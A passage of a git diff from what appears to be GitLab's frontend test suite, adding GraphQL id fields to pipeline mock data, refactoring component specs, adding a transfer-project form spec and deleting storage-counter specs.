'78', __typename: 'CiJob', }, project: { @@ -613,8 +687,10 @@ export const wrappedPipelineReturn = { { name: 'build', __typename: 'CiStage', + id: '79', status: { action: null, + id: '80', __typename: 'DetailedStatus', }, groups: { @@ -622,8 +698,10 @@ export const wrappedPipelineReturn = { nodes: [ { __typename: 'CiGroup', + id: '81', status: { __typename: 'DetailedStatus', + id: '82', label: 'passed', group: 'success', icon: 'status_success', @@ -635,6 +713,7 @@ export const wrappedPipelineReturn = { nodes: [ { __typename: 'CiJob', + id: '83', name: 'build_n', scheduledAt: null, needs: { @@ -643,6 +722,7 @@ export const wrappedPipelineReturn = { }, status: { __typename: 'DetailedStatus', + id: '84', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -650,6 +730,7 @@ export const wrappedPipelineReturn = { group: 'success', action: { __typename: 'StatusAction', + id: '85', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/elemenohpee/-/jobs/1662/retry', diff --git a/spec/frontend/pipelines/mock_data.js b/spec/frontend/pipelines/mock_data.js index fdc78d48901..b9d20eb7ca5 100644 --- a/spec/frontend/pipelines/mock_data.js +++ b/spec/frontend/pipelines/mock_data.js @@ -14,6 +14,7 @@ export const mockPipelineHeader = { }, createdAt: threeWeeksAgo.toISOString(), user: { + id: 'user-1', name: 'Foo', username: 'foobar', email: 'foo@bar.com', @@ -27,6 +28,7 @@ export const mockFailedPipelineHeader = { retryable: true, cancelable: false, detailedStatus: { + id: 'status-1', group: 'failed', icon: 'status_failed', label: 'failed', @@ -43,6 +45,7 @@ export const mockFailedPipelineNoPermissions = { }, createdAt: threeWeeksAgo.toISOString(), user: { + id: 'user-1', name: 'Foo', username: 'foobar', email: 'foo@bar.com', @@ -52,6 +55,7 @@ export const mockFailedPipelineNoPermissions = { retryable: true, cancelable: false, detailedStatus: { + id: 'status-1', group: 'running', icon: 'status_running', label: 'running', @@ -66,6 +70,7 @@ export const mockRunningPipelineHeader = { retryable: false, cancelable: true, detailedStatus: { + id: 'status-1', group: 'running', icon: 'status_running', label: 'running', @@ -82,6 +87,7 @@ export const mockRunningPipelineNoPermissions = { }, createdAt: threeWeeksAgo.toISOString(), user: { + id: 'user-1', name: 'Foo', username: 'foobar', email: 'foo@bar.com', @@ -91,6 +97,7 @@ export const mockRunningPipelineNoPermissions = { retryable: false, cancelable: true, detailedStatus: { + id: 'status-1', group: 'running', icon: 'status_running', label: 'running', @@ -105,6 +112,7 @@ export const mockCancelledPipelineHeader = { retryable: true, cancelable: false, detailedStatus: { + id: 'status-1', group: 'cancelled', icon: 'status_cancelled', label: 'cancelled', @@ -119,6 +127,7 @@ export const mockSuccessfulPipelineHeader = { retryable: false, cancelable: false, detailedStatus: { + id: 'status-1', group: 'success', icon: 'status_success', label: 'success', @@ -130,13 +139,16 @@ export const mockSuccessfulPipelineHeader = { export const mockRunningPipelineHeaderData = { data: { project: { + id: '1', pipeline: { ...mockRunningPipelineHeader, iid: '28', user: { + id: 'user-1', name: 'Foo', username: 'foobar', webPath: '/foo', + webUrl: '/foo', email: 'foo@bar.com', avatarUrl: 'link', status: null, @@ -493,3 +505,132 @@ export const mockSearch = [ export const mockBranchesAfterMap = ['branch-1', 'branch-10', 'branch-11']; export const mockTagsAfterMap = ['tag-3', 'tag-2', 'tag-1', 'main-tag']; + +export const mockPipelineJobsQueryResponse = { + data: { + project: { + id: 'gid://gitlab/Project/20', + __typename: 'Project', + pipeline: { + id: 'gid://gitlab/Ci::Pipeline/224', + __typename: 'Pipeline', + jobs: { + __typename: 'CiJobConnection', + pageInfo: { + endCursor: 'eyJpZCI6Ijg0NyJ9', + hasNextPage: true, + hasPreviousPage: false, + startCursor: 'eyJpZCI6IjYyMCJ9', + __typename: 'PageInfo', + }, + nodes: [ + { + artifacts: { + nodes: [ + { + downloadPath: '/root/ci-project/-/jobs/620/artifacts/download?file_type=trace', + fileType: 'TRACE', + __typename: 'CiJobArtifact', + }, + ], + __typename: 'CiJobArtifactConnection', + }, + allowFailure: false, + status: 'SUCCESS', + scheduledAt: null, + manualJob: false, + triggered: null, + createdByTag: false, + detailedStatus: { + id: 'success-620-620', + detailsPath: '/root/ci-project/-/jobs/620', + group: 'success', + icon: 'status_success', + label: 'passed', + text: 'passed', + tooltip: 'passed (retried)', + action: null, + __typename: 'DetailedStatus', + }, + id: 'gid://gitlab/Ci::Build/620', + refName: 'main', + refPath: '/root/ci-project/-/commits/main', + tags: [], + shortSha: '5acce24b', + commitPath: '/root/ci-project/-/commit/5acce24b3737d4f0d649ad0a26ae1903a2b35f5e', + stage: { id: 'gid://gitlab/Ci::Stage/148', name: 'test', __typename: 'CiStage' }, + name: 'coverage_job', + duration: 4, + finishedAt: '2021-12-06T14:13:49Z', + coverage: 82.71, + retryable: false, + playable: false, + cancelable: false, + active: false, + stuck: false, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: true, + __typename: 'JobPermissions', + }, + __typename: 'CiJob', + }, + { + artifacts: { + nodes: [ + { + downloadPath: '/root/ci-project/-/jobs/619/artifacts/download?file_type=trace', + fileType: 'TRACE', + __typename: 'CiJobArtifact', + }, + ], + __typename: 'CiJobArtifactConnection', + }, + allowFailure: false, + status: 'SUCCESS', + scheduledAt: null, + manualJob: false, + triggered: null, + createdByTag: false, + detailedStatus: { + id: 'success-619-619', + detailsPath: '/root/ci-project/-/jobs/619', + group: 'success', + icon: 'status_success', + label: 'passed', + text: 'passed', + tooltip: 'passed (retried)', + action: null, + __typename: 'DetailedStatus', + }, + id: 'gid://gitlab/Ci::Build/619', + refName: 'main', + refPath: '/root/ci-project/-/commits/main', + tags: [], + shortSha: '5acce24b', + commitPath: '/root/ci-project/-/commit/5acce24b3737d4f0d649ad0a26ae1903a2b35f5e', + stage: { id: 'gid://gitlab/Ci::Stage/148', name: 'test', __typename: 'CiStage' }, + name: 'test_job_two', + duration: 4, + finishedAt: '2021-12-06T14:13:44Z', + coverage: null, + retryable: false, + playable: false, + cancelable: false, + active: false, + stuck: false, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: true, + __typename: 'JobPermissions', + }, + __typename: 'CiJob', + }, + ], + }, + }, + }, + }, +}; diff --git a/spec/frontend/projects/new/components/new_project_url_select_spec.js b/spec/frontend/projects/new/components/new_project_url_select_spec.js index b3f177a1f12..258fa7636d4 100644 --- a/spec/frontend/projects/new/components/new_project_url_select_spec.js +++ b/spec/frontend/projects/new/components/new_project_url_select_spec.js @@ -5,7 +5,8 @@ import { GlDropdownSectionHeader, GlSearchBoxByType, } from '@gitlab/ui'; -import { createLocalVue, mount, shallowMount } from '@vue/test-utils'; +import { mount, shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import { mockTracking, unmockTracking } from 'helpers/tracking_helper'; @@ -19,6 +20,7 @@ describe('NewProjectUrlSelect component', () => { const data = { currentUser: { + id: 'user-1', groups: { nodes: [ { @@ -51,8 +53,7 @@ describe('NewProjectUrlSelect component', () => { }, }; - const localVue = createLocalVue(); - localVue.use(VueApollo); + Vue.use(VueApollo); const defaultProvide = { namespaceFullPath: 'h5bp', @@ -63,17 +64,19 @@ describe('NewProjectUrlSelect component', () => { userNamespaceId: '1', }; + let mockQueryResponse; + const mountComponent = ({ search = '', queryResponse = data, provide = defaultProvide, mountFn = shallowMount, } = {}) => { - const requestHandlers = [[searchQuery, jest.fn().mockResolvedValue({ data: queryResponse })]]; + mockQueryResponse = jest.fn().mockResolvedValue({ data: queryResponse }); + const requestHandlers = [[searchQuery, mockQueryResponse]]; const apolloProvider = createMockApollo(requestHandlers); return mountFn(NewProjectUrlSelect, { - localVue, apolloProvider, provide, data() { @@ -87,12 +90,19 @@ describe('NewProjectUrlSelect component', () => { const findButtonLabel = () => wrapper.findComponent(GlButton); const findDropdown = () => wrapper.findComponent(GlDropdown); const findInput = () => wrapper.findComponent(GlSearchBoxByType); - const findHiddenInput = () => wrapper.find('input'); + const findHiddenInput = () => wrapper.find('[name="project[namespace_id]"]'); + const clickDropdownItem = async () => { wrapper.findComponent(GlDropdownItem).vm.$emit('click'); await wrapper.vm.$nextTick(); }; + const showDropdown = async () => { + findDropdown().vm.$emit('shown'); + await wrapper.vm.$apollo.queries.currentUser.refetch(); + jest.runOnlyPendingTimers(); + }; + afterEach(() => { wrapper.destroy(); }); @@ -140,20 +150,18 @@ describe('NewProjectUrlSelect component', () => { it('focuses on the input when the dropdown is opened', async () => { wrapper = mountComponent({ mountFn: mount }); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); const spy = jest.spyOn(findInput().vm, 'focusInput'); - findDropdown().vm.$emit('shown'); + await showDropdown(); expect(spy).toHaveBeenCalledTimes(1); }); it('renders expected dropdown items', async () => { wrapper = mountComponent({ mountFn: mount }); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + + await showDropdown(); const listItems = wrapper.findAll('li'); @@ -166,15 +174,36 @@ describe('NewProjectUrlSelect component', () => { expect(listItems.at(5).text()).toBe(data.currentUser.namespace.fullPath); }); + describe('query fetching', () => { + describe('on component mount', () => { + it('does not fetch query', () => { + wrapper = mountComponent({ mountFn: mount }); + + expect(mockQueryResponse).not.toHaveBeenCalled(); + }); + }); + + describe('on dropdown shown', () => { + it('fetches query', async () => { + wrapper = mountComponent({ mountFn: mount }); + + await showDropdown(); + + expect(mockQueryResponse).toHaveBeenCalled(); + }); + }); + }); + describe('when selecting from a group template', () => { - const groupId = getIdFromGraphQLId(data.currentUser.groups.nodes[1].id); + const { fullPath, id } = data.currentUser.groups.nodes[1]; beforeEach(async () => { wrapper = mountComponent({ mountFn: mount }); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); - eventHub.$emit('select-template', groupId); + // Show dropdown to fetch projects + await showDropdown(); + + eventHub.$emit('select-template', getIdFromGraphQLId(id), fullPath); }); it('filters the dropdown items to the selected group and children', async () => { @@ -187,13 +216,14 @@ describe('NewProjectUrlSelect component', () => { }); it('sets the selection to the group', async () => { - expect(findDropdown().props('text')).toBe(data.currentUser.groups.nodes[1].fullPath); + expect(findDropdown().props('text')).toBe(fullPath); }); }); it('renders `No matches found` when there are no matching dropdown items', async () => { const queryResponse = { currentUser: { + id: 'user-1', groups: { nodes: [], }, @@ -212,12 +242,13 @@ describe('NewProjectUrlSelect component', () => { }); it('emits `update-visibility` event to update the visibility radio options', async () => { - wrapper = mountComponent(); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + wrapper = mountComponent({ mountFn: mount }); const spy = jest.spyOn(eventHub, '$emit'); + // Show dropdown to fetch projects + await showDropdown(); + await clickDropdownItem(); const namespace = data.currentUser.groups.nodes[0]; @@ -231,16 +262,16 @@ describe('NewProjectUrlSelect component', () => { }); it('updates hidden input with selected namespace', async () => { - wrapper = mountComponent(); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + wrapper = mountComponent({ mountFn: mount }); + + // Show dropdown to fetch projects + await showDropdown(); await clickDropdownItem(); - expect(findHiddenInput().attributes()).toMatchObject({ - name: 'project[namespace_id]', - value: getIdFromGraphQLId(data.currentUser.groups.nodes[0].id).toString(), - }); + expect(findHiddenInput().attributes('value')).toBe( + getIdFromGraphQLId(data.currentUser.groups.nodes[0].id).toString(), + ); }); it('tracks clicking on the dropdown', () => { diff --git a/spec/frontend/projects/pipelines/charts/components/__snapshots__/statistics_list_spec.js.snap b/spec/frontend/projects/pipelines/charts/components/__snapshots__/statistics_list_spec.js.snap index be3716c24e6..5ec0ad794fb 100644 --- a/spec/frontend/projects/pipelines/charts/components/__snapshots__/statistics_list_spec.js.snap +++ b/spec/frontend/projects/pipelines/charts/components/__snapshots__/statistics_list_spec.js.snap @@ -25,9 +25,13 @@ exports[`StatisticsList displays the counts data with labels 1`] = ` Failed: </span> - <strong> - 2 pipelines - </strong> + <gl-link-stub + href="/flightjs/Flight/-/pipelines?page=1&scope=all&status=failed" + > + + 2 pipelines + + </gl-link-stub> </li> <li> <span> diff --git a/spec/frontend/projects/pipelines/charts/components/app_spec.js b/spec/frontend/projects/pipelines/charts/components/app_spec.js index b4067f6a72b..574756322c7 100644 --- a/spec/frontend/projects/pipelines/charts/components/app_spec.js +++ b/spec/frontend/projects/pipelines/charts/components/app_spec.js @@ -1,11 +1,12 @@ import { GlTabs, GlTab } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; import { merge } from 'lodash'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import setWindowLocation from 'helpers/set_window_location_helper'; import { TEST_HOST } from 'helpers/test_constants'; import { mergeUrlParams, updateHistory, getParameterValues } from '~/lib/utils/url_utility'; import Component from '~/projects/pipelines/charts/components/app.vue'; import PipelineCharts from '~/projects/pipelines/charts/components/pipeline_charts.vue'; +import API from '~/api'; jest.mock('~/lib/utils/url_utility'); @@ -17,7 +18,7 @@ describe('ProjectsPipelinesChartsApp', () => { let wrapper; function createComponent(mountOptions = {}) { - wrapper = shallowMount( + wrapper = shallowMountExtended( Component, merge( {}, @@ -118,6 +119,23 @@ describe('ProjectsPipelinesChartsApp', () => { expect(updateHistory).not.toHaveBeenCalled(); }); + + describe('event tracking', () => { + it.each` + testId | event + ${'pipelines-tab'} | ${'p_analytics_ci_cd_pipelines'} + ${'deployment-frequency-tab'} | ${'p_analytics_ci_cd_deployment_frequency'} + ${'lead-time-tab'} | ${'p_analytics_ci_cd_lead_time'} + `('tracks the $event event when clicked', ({ testId, event }) => { + jest.spyOn(API, 'trackRedisHllUserEvent'); + + expect(API.trackRedisHllUserEvent).not.toHaveBeenCalled(); + + wrapper.findByTestId(testId).vm.$emit('click'); + + expect(API.trackRedisHllUserEvent).toHaveBeenCalledWith(event); + }); + }); }); describe('when provided with a query param', () => { diff --git a/spec/frontend/projects/pipelines/charts/components/statistics_list_spec.js b/spec/frontend/projects/pipelines/charts/components/statistics_list_spec.js index 4e79f62ce81..57a864cb2c4 100644 --- a/spec/frontend/projects/pipelines/charts/components/statistics_list_spec.js +++ b/spec/frontend/projects/pipelines/charts/components/statistics_list_spec.js @@ -1,3 +1,4 @@ +import { GlLink } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import Component from '~/projects/pipelines/charts/components/statistics_list.vue'; import { counts } from '../mock_data'; @@ -5,8 +6,15 @@ import { counts } from '../mock_data'; describe('StatisticsList', () => { let wrapper; + const failedPipelinesLink = '/flightjs/Flight/-/pipelines?page=1&scope=all&status=failed'; + + const findFailedPipelinesLink = () => wrapper.findComponent(GlLink); + beforeEach(() => { wrapper = shallowMount(Component, { + provide: { + failedPipelinesLink, + }, propsData: { counts, }, @@ -15,10 +23,13 @@ describe('StatisticsList', () => { afterEach(() => { wrapper.destroy(); - wrapper = null; }); it('displays the counts data with labels', () => { expect(wrapper.element).toMatchSnapshot(); }); + + it('displays failed pipelines link', () => { + expect(findFailedPipelinesLink().attributes('href')).toBe(failedPipelinesLink); + }); }); diff --git a/spec/frontend/projects/pipelines/charts/mock_data.js b/spec/frontend/projects/pipelines/charts/mock_data.js index 2e2c594102c..04971b5b20e 100644 --- a/spec/frontend/projects/pipelines/charts/mock_data.js +++ b/spec/frontend/projects/pipelines/charts/mock_data.js @@ -48,6 +48,7 @@ export const transformedAreaChartData = [ export const mockPipelineCount = { data: { project: { + id: '1', totalPipelines: { count: 34, __typename: 'PipelineConnection' }, successfulPipelines: { count: 23, __typename: 'PipelineConnection' }, failedPipelines: { count: 1, __typename: 'PipelineConnection' }, @@ -70,6 +71,7 @@ export const chartOptions = { export const mockPipelineStatistics = { data: { project: { + id: '1', pipelineAnalytics: { weekPipelinesTotals: [0, 0, 0, 0, 0, 0, 0, 0], weekPipelinesLabels: [ diff --git a/spec/frontend/projects/settings/components/transfer_project_form_spec.js b/spec/frontend/projects/settings/components/transfer_project_form_spec.js new file mode 100644 index 00000000000..f7ce7c6f840 --- /dev/null +++ b/spec/frontend/projects/settings/components/transfer_project_form_spec.js @@ -0,0 +1,68 @@ +import { namespaces } from 'jest/vue_shared/components/namespace_select/mock_data'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import TransferProjectForm from '~/projects/settings/components/transfer_project_form.vue'; +import NamespaceSelect from '~/vue_shared/components/namespace_select/namespace_select.vue'; +import ConfirmDanger from '~/vue_shared/components/confirm_danger/confirm_danger.vue'; + +describe('Transfer project form', () => { + let wrapper; + + const confirmButtonText = 'Confirm'; + const confirmationPhrase = 'You must construct additional pylons!'; + + const createComponent = () => + shallowMountExtended(TransferProjectForm, { + propsData: { + namespaces, + confirmButtonText, + confirmationPhrase, + }, + }); + + const findNamespaceSelect = () => wrapper.findComponent(NamespaceSelect); + const findConfirmDanger = () => wrapper.findComponent(ConfirmDanger); + + beforeEach(() => { + wrapper = createComponent(); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders the namespace selector', () => { + expect(findNamespaceSelect().exists()).toBe(true); + }); + + it('renders the confirm button', () => { + expect(findConfirmDanger().exists()).toBe(true); + }); + + it('disables the confirm button by default', () => { + expect(findConfirmDanger().attributes('disabled')).toBe('true'); + }); + + describe('with a selected namespace', () => { + const [selectedItem] = namespaces.group; + + beforeEach(() => { + findNamespaceSelect().vm.$emit('select', selectedItem); + }); + + it('emits the `selectNamespace` event when a namespace is selected', () => { + const args = [selectedItem.id]; + + expect(wrapper.emitted('selectNamespace')).toEqual([args]); + }); + + it('enables the confirm button', () => { + expect(findConfirmDanger().attributes('disabled')).toBeUndefined(); + }); + + it('clicking the confirm button emits the `confirm` event', () => { + findConfirmDanger().vm.$emit('confirm'); + + expect(wrapper.emitted('confirm')).toBeDefined(); + }); + }); +}); diff --git a/spec/frontend/projects/settings_service_desk/components/service_desk_setting_spec.js b/spec/frontend/projects/settings_service_desk/components/service_desk_setting_spec.js index 0fd3e7446da..875c58583df 100644 --- a/spec/frontend/projects/settings_service_desk/components/service_desk_setting_spec.js +++ b/spec/frontend/projects/settings_service_desk/components/service_desk_setting_spec.js @@ -1,5 +1,5 @@ import { GlButton, GlDropdown, GlLoadingIcon, GlToggle } from '@gitlab/ui'; -import { shallowMount, mount } from '@vue/test-utils'; +import { mount } from '@vue/test-utils'; import { nextTick } from 'vue'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import ServiceDeskSetting from '~/projects/settings_service_desk/components/service_desk_setting.vue'; @@ -11,14 +11,14 @@ describe('ServiceDeskSetting', () => { const findButton = () => wrapper.find(GlButton); const findClipboardButton = () => wrapper.find(ClipboardButton); const findIncomingEmail = () => wrapper.findByTestId('incoming-email'); - const findIncomingEmailLabel = () => wrapper.findByTestId('incoming-email-describer'); + const findIncomingEmailLabel = () => wrapper.findByTestId('incoming-email-label'); const findLoadingIcon = () => wrapper.find(GlLoadingIcon); const findTemplateDropdown = () => wrapper.find(GlDropdown); const findToggle = () => wrapper.find(GlToggle); - const createComponent = ({ props = {}, mountFunction = shallowMount } = {}) => + const createComponent = ({ props = {} } = {}) => extendedWrapper( - mountFunction(ServiceDeskSetting, { + mount(ServiceDeskSetting, { propsData: { isEnabled: true, ...props, @@ -131,8 +131,7 @@ describe('ServiceDeskSetting', () => { it('shows error when value contains uppercase or special chars', async () => { wrapper = createComponent({ - props: { customEmailEnabled: true }, - mountFunction: mount, + props: { email: 'foo@bar.com', customEmailEnabled: true }, }); const input = wrapper.findByTestId('project-suffix'); @@ -142,7 +141,7 @@ describe('ServiceDeskSetting', () => { await wrapper.vm.$nextTick(); - const errorText = wrapper.find('.text-danger'); + const errorText = wrapper.find('.invalid-feedback'); expect(errorText.exists()).toBe(true); }); }); diff --git a/spec/frontend/projects/storage_counter/components/app_spec.js b/spec/frontend/projects/storage_counter/components/app_spec.js deleted file mode 100644 index f3da01e0602..00000000000 --- a/spec/frontend/projects/storage_counter/components/app_spec.js +++ /dev/null @@ -1,150 +0,0 @@ -import { GlAlert, GlLoadingIcon } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import VueApollo from 'vue-apollo'; -import createMockApollo from 'helpers/mock_apollo_helper'; -import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import waitForPromises from 'helpers/wait_for_promises'; -import StorageCounterApp from '~/projects/storage_counter/components/app.vue'; -import { TOTAL_USAGE_DEFAULT_TEXT } from '~/projects/storage_counter/constants'; -import getProjectStorageCount from '~/projects/storage_counter/queries/project_storage.query.graphql'; -import UsageGraph from '~/vue_shared/components/storage_counter/usage_graph.vue'; -import { - mockGetProjectStorageCountGraphQLResponse, - mockEmptyResponse, - projectData, - defaultProvideValues, -} from '../mock_data'; - -const localVue = createLocalVue(); -localVue.use(VueApollo); - -describe('Storage counter app', () => { - let wrapper; - - const createMockApolloProvider = ({ reject = false, mockedValue } = {}) => { - let response; - - if (reject) { - response = jest.fn().mockRejectedValue(mockedValue || new Error('GraphQL error')); - } else { - response = jest.fn().mockResolvedValue(mockedValue); - } - - const requestHandlers = [[getProjectStorageCount, response]]; - - return createMockApollo(requestHandlers); - }; - - const createComponent = ({ provide = {}, mockApollo } = {}) => { - wrapper = extendedWrapper( - shallowMount(StorageCounterApp, { - localVue, - apolloProvider: mockApollo, - provide: { - ...defaultProvideValues, - ...provide, - }, - }), - ); - }; - - const findAlert = () => wrapper.findComponent(GlAlert); - const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); - const findUsagePercentage = () => wrapper.findByTestId('total-usage'); - const findUsageQuotasHelpLink = () => wrapper.findByTestId('usage-quotas-help-link'); - const findUsageGraph = () => wrapper.findComponent(UsageGraph); - - afterEach(() => { - wrapper.destroy(); - }); - - describe('with apollo fetching successful', () => { - let mockApollo; - - beforeEach(async () => { - mockApollo = createMockApolloProvider({ - mockedValue: mockGetProjectStorageCountGraphQLResponse, - }); - createComponent({ mockApollo }); - await waitForPromises(); - }); - - it('renders correct total usage', () => { - expect(findUsagePercentage().text()).toBe(projectData.storage.totalUsage); - }); - - it('renders correct usage quotas help link', () => { - expect(findUsageQuotasHelpLink().attributes('href')).toBe( - defaultProvideValues.helpLinks.usageQuotasHelpPagePath, - ); - }); - }); - - describe('with apollo loading', () => { - let mockApollo; - - beforeEach(() => { - mockApollo = createMockApolloProvider({ - mockedValue: new Promise(() => {}), - }); - createComponent({ mockApollo }); - }); - - it('should show loading icon', () => { - expect(findLoadingIcon().exists()).toBe(true); - }); - }); - - describe('with apollo returning empty data', () => { - let mockApollo; - - beforeEach(async () => { - mockApollo = createMockApolloProvider({ - mockedValue: mockEmptyResponse, - }); - createComponent({ mockApollo }); - await waitForPromises(); - }); - - it('shows default text for total usage', () => { - expect(findUsagePercentage().text()).toBe(TOTAL_USAGE_DEFAULT_TEXT); - }); - }); - - describe('with apollo fetching error', () => { - let mockApollo; - - beforeEach(() => { - mockApollo = createMockApolloProvider(); - createComponent({ mockApollo, reject: true }); - }); - - it('renders gl-alert', () => { - expect(findAlert().exists()).toBe(true); - }); - }); - - describe('rendering <usage-graph />', () => { - let mockApollo; - - beforeEach(async () => { - mockApollo = createMockApolloProvider({ - mockedValue: mockGetProjectStorageCountGraphQLResponse, - }); - createComponent({ mockApollo }); - await waitForPromises(); - }); - - it('renders usage-graph component if project.statistics exists', () => { - expect(findUsageGraph().exists()).toBe(true); - }); - - it('passes project.statistics to usage-graph component', () => { - const { - __typename, - ...statistics - } = mockGetProjectStorageCountGraphQLResponse.data.project.statistics; - expect(findUsageGraph().props('rootStorageStatistics')).toMatchObject(statistics); - }); - }); -}); diff --git a/spec/frontend/projects/storage_counter/components/storage_table_spec.js b/spec/frontend/projects/storage_counter/components/storage_table_spec.js deleted file mode 100644 index c9e56d8f033..00000000000 --- a/spec/frontend/projects/storage_counter/components/storage_table_spec.js +++ /dev/null @@ -1,63 +0,0 @@ -import { GlTableLite } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import StorageTable from '~/projects/storage_counter/components/storage_table.vue'; -import { projectData, defaultProvideValues } from '../mock_data'; - -describe('StorageTable', () => { - let wrapper; - - const defaultProps = { - storageTypes: projectData.storage.storageTypes, - }; - - const createComponent = (props = {}) => { - wrapper = extendedWrapper( - mount(StorageTable, { - propsData: { - ...defaultProps, - ...props, - }, - }), - ); - }; - - const findTable = () => wrapper.findComponent(GlTableLite); - - beforeEach(() => { - createComponent(); - }); - afterEach(() => { - wrapper.destroy(); - }); - - describe('with storage types', () => { - it.each(projectData.storage.storageTypes)( - 'renders table row correctly %o', - ({ storageType: { id, name, description } }) => { - expect(wrapper.findByTestId(`${id}-name`).text()).toBe(name); - expect(wrapper.findByTestId(`${id}-description`).text()).toBe(description); - expect(wrapper.findByTestId(`${id}-icon`).props('name')).toBe(id); - expect(wrapper.findByTestId(`${id}-help-link`).attributes('href')).toBe( - defaultProvideValues.helpLinks[id.replace(`Size`, `HelpPagePath`)] - .replace(`Size`, ``) - .replace(/[A-Z]/g, (m) => `-${m.toLowerCase()}`), - ); - }, - ); - }); - - describe('without storage types', () => { - beforeEach(() => { - createComponent({ storageTypes: [] }); - }); - - it('should render the table header <th>', () => { - expect(findTable().find('th').exists()).toBe(true); - }); - - it('should not render any table data <td>', () => { - expect(findTable().find('td').exists()).toBe(false); - }); - }); -}); diff --git a/spec/frontend/projects/storage_counter/components/storage_type_icon_spec.js b/spec/frontend/projects/storage_counter/components/storage_type_icon_spec.js deleted file mode 100644 index 01efd6f14bd..00000000000 --- a/spec/frontend/projects/storage_counter/components/storage_type_icon_spec.js +++ /dev/null @@ -1,41 +0,0 @@ -import { mount } from '@vue/test-utils'; -import { GlIcon } from '@gitlab/ui'; -import StorageTypeIcon from '~/projects/storage_counter/components/storage_type_icon.vue'; - -describe('StorageTypeIcon', () => { - let wrapper; - - const createComponent = (props = {}) => { - wrapper = mount(StorageTypeIcon, { - propsData: { - ...props, - }, - }); - }; - - const findGlIcon = () => wrapper.findComponent(GlIcon); - - describe('rendering icon', () => { - afterEach(() => { - wrapper.destroy(); - }); - - it.each` - expected | provided - ${'doc-image'} | ${'lfsObjectsSize'} - ${'snippet'} | ${'snippetsSize'} - ${'infrastructure-registry'} | ${'repositorySize'} - ${'package'} | ${'packagesSize'} - ${'upload'} | ${'uploadsSize'} - ${'disk'} | ${'wikiSize'} - ${'disk'} | ${'anything-else'} - `( - 'renders icon with name of $expected when name prop is $provided', - ({ expected, provided }) => { - createComponent({ name: provided }); - - expect(findGlIcon().props('name')).toBe(expected); - }, - ); - }); -}); diff --git a/spec/frontend/projects/storage_counter/mock_data.js b/spec/frontend/projects/storage_counter/mock_data.js deleted file mode 100644 index 6b3e23ac386..00000000000 --- a/spec/frontend/projects/storage_counter/mock_data.js +++ /dev/null @@ -1,92 +0,0 @@ -import mockGetProjectStorageCountGraphQLResponse from 'test_fixtures/graphql/projects/storage_counter/project_storage.query.graphql.json'; - -export { mockGetProjectStorageCountGraphQLResponse }; - -export const mockEmptyResponse = { data: { project: null } }; - -export const defaultProvideValues = { - projectPath: '/project-path', - helpLinks: { - usageQuotasHelpPagePath: '/usage-quotas', - buildArtifactsHelpPagePath: '/build-artifacts', - lfsObjectsHelpPagePath: '/lsf-objects', - packagesHelpPagePath: '/packages', - repositoryHelpPagePath: '/repository', - snippetsHelpPagePath: '/snippets', - uploadsHelpPagePath: '/uploads', - wikiHelpPagePath: '/wiki', - }, -}; - -export const projectData = { - storage: { - totalUsage: '13.8 MiB', - storageTypes: [ - { - storageType: { - id: 'buildArtifactsSize', - name: 'Artifacts', - description: 'Pipeline artifacts and job artifacts, created with CI/CD.', - warningMessage: - 'Because of a known issue, the artifact total for some projects may be incorrect. For more details, read %{warningLinkStart}the epic%{warningLinkEnd}.', - helpPath: '/build-artifacts', - }, - value: 400000, - }, - { - storageType: { - id: 'lfsObjectsSize', - name: 'LFS storage', - description: 'Audio samples, videos, datasets, and graphics.', - helpPath: '/lsf-objects', - }, - value: 4800000, - }, - { - storageType: { - id: 'packagesSize', - name: 'Packages', - description: 'Code packages and container images.', - helpPath: '/packages', - }, - value: 3800000, - }, - { - storageType: { - id: 'repositorySize', - name: 'Repository', - description: 'Git repository.', - helpPath: '/repository', - }, - value: 3900000, - }, - { - storageType: { - id: 'snippetsSize', - name: 'Snippets', - description: 'Shared bits of code and text.', - helpPath: '/snippets', - }, - value: 0, - }, - { - storageType: { - id: 'uploadsSize', - name: 'Uploads', - description: 'File attachments and smaller design graphics.', - helpPath: '/uploads', - }, - value: 900000, - }, - { - storageType: { - id: 'wikiSize', - name: 'Wiki', - description: 'Wiki content.', - helpPath: '/wiki', - }, - value: 300000, - }, - ], - }, -}; diff --git a/spec/frontend/projects/storage_counter/utils_spec.js b/spec/frontend/projects/storage_counter/utils_spec.js deleted file mode 100644 index fb91975a3cf..00000000000 --- a/spec/frontend/projects/storage_counter/utils_spec.js +++ /dev/null @@ -1,34 +0,0 @@ -import { parseGetProjectStorageResults } from '~/projects/storage_counter/utils'; -import { - mockGetProjectStorageCountGraphQLResponse, - projectData, - defaultProvideValues, -} from './mock_data'; - -describe('parseGetProjectStorageResults', () => { - it('parses project statistics correctly', () => { - expect( - parseGetProjectStorageResults( - mockGetProjectStorageCountGraphQLResponse.data, - defaultProvideValues.helpLinks, - ), - ).toMatchObject(projectData); - }); - - it('includes storage type with size of 0 in returned value', () => { - const mockedResponse = mockGetProjectStorageCountGraphQLResponse.data; - // ensuring a specific storage type item has size of 0 - mockedResponse.project.statistics.repositorySize = 0; - - const response = parseGetProjectStorageResults(mockedResponse, defaultProvideValues.helpLinks); - - expect(response.storage.storageTypes).toEqual( - expect.arrayContaining([ - { - storageType: expect.any(Object), - value: 0, - }, - ]), - ); - }); -}); diff --git a/spec/frontend/releases/__snapshots__/util_spec.js.snap 